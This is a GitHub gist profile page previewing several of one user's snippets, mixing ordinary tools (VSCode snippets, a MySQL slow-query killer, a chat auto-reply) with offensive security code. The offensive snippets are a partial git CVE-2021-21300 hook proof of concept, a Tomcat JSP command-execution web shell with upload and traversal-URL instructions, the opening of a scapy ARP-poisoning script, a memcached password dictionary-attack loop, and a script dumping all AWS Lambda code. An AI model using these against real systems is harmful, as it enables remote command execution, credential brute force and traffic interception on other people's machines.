Skip to content

Instantly share code, notes, and snippets.

View full-sized avatar
🏠
Working from home

Julio Silveira Melo juliosmelo

🏠
Working from home
43 followers · 16 following
  • laboratoriohacker.com
  • Blue earth
View GitHub Profile
@juliosmelo
juliosmelo / web-servers.md
Created June 6, 2023 00:33 — forked from willurd/web-servers.md
Big list of http static server one-liners
View web-servers.md
@juliosmelo
juliosmelo / CVE-2021-21300-exploit
Created March 11, 2021 17:57
View CVE-2021-21300-exploit
#!/bin/sh
git init delayed-checkout &&
(
cd delayed-checkout &&
echo "A/post-checkout filter=lfs diff=lfs merge=lfs" \
>.gitattributes &&
mkdir A &&
printf '#!/bin/sh\n\necho PWNED >&2\n' >A/post-checkout &&
chmod +x A/post-checkout &&
@juliosmelo
juliosmelo / cve-2007-1860
Created November 6, 2020 17:53
Tomcat CVE-2007-1960 backdoor
View cve-2007-1860
# how to use
# build
# $ jar -cvf index.war *
# upload to tomacat server
# execute
# http://taget/%252e%252e/%252e%252e/cve-2007-1860/index.jsp?cmd=ls
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
@juliosmelo
juliosmelo / gist:d1f6a0dccf9be4428dca855c185e6367
Created September 25, 2020 12:51
Python script for ARP poison attacks
View gist:d1f6a0dccf9be4428dca855c185e6367
import os
import sys
import threading
import signal
from scapy.all import *
HWDST_SRC = "ff:ff:ff:ff:ff:ff"
interface = ""
target_ip = ""
@juliosmelo
juliosmelo / fuckUOLChat.js
Created April 14, 2020 21:18
UOL auto response
View fuckUOLChat.js
var timex = setInterval(sendFuckingMsg, 30000);
function sendFuckingMsg(){
productName = "ESPN Ilimitado";
uolPersonName = document.getElementById("Span1").textContent;
textField = document.getElementById("message");
button = document.getElementsByClassName("vinter-button vinter-quest-btnSend")[0];
textField.value = "Oi" + uolPersonName + "Não estou interessado. Quero CANCELAR o " + productName + "!";
button.click();
}
@juliosmelo
juliosmelo / Kill sleep or slow query in mysql
Created June 1, 2016 17:10
View Kill sleep or slow query in mysql
#!/usr/bin/python
# -*- coding: utf-8 -*-
import logging
import MySQLdb as mdb
from datetime import datetime
import sys
logging.basicConfig(
filename='killed_queries.log',
filemode='w',
@juliosmelo
juliosmelo / memcached-dictonary-attack.sh
Created January 16, 2020 14:24
View memcached-dictonary-attack.sh
#! /bin/bash
while read F ; do
echo "Trying $F"
if memcstat --servers=$1 --username=$2 --password=$F | grep -q Server ; then
echo "Password Found: "$F
break
fi
done < $3
@juliosmelo
juliosmelo / get-lambdas.sh
Created December 30, 2019 18:10
Simple script to download all AWS Lambad functions in a given region
View get-lambdas.sh
#!/bin/bash
aws_region='us-east-1'
functions=$(aws lambda list-functions --region us-east-1 | jq -r '.Functions[].FunctionName')
for function in $functions; do
datetime=$(date)
echo "[$datetime] Downloading Lambda $function"
function_url=$(aws lambda get-function --function-name $function --query 'Code.Location' --region $aws_region)
url=$(echo $function_url | tr -d '"')
@juliosmelo
juliosmelo / vsc_js_snippets.json
Created September 11, 2019 16:11 — forked from bradtraversy/vsc_js_snippets.json
VSCode JavaScript Snippets
View vsc_js_snippets.json
{
"Console Log": {
"prefix": "cl",
"body": "console.log($1);",
"description": "Console Log"
},
"Named Function": {
"prefix": "nfn",
"body": ["function ${1:functionName}($2) {", " $3", "}"],
"description": "Named Function"
@juliosmelo
juliosmelo / vsc-awesome-extensions.sh
Created August 13, 2019 18:18
Just a list of cool vsc extensions.
View vsc-awesome-extensions.sh
#!/bin/bash
code --install-extension andys8.jest-snippets
code --install-extension christian-kohler.npm-intellisense
code --install-extension christian-kohler.path-intellisense
code --install-extension cssho.vscode-svgviewer
code --install-extension dbaeumer.vscode-eslint
code --install-extension donjayamanne.githistory
code --install-extension dracula-theme.theme-dracula
code --install-extension eamodio.gitlens
code --install-extension EditorConfig.EditorConfig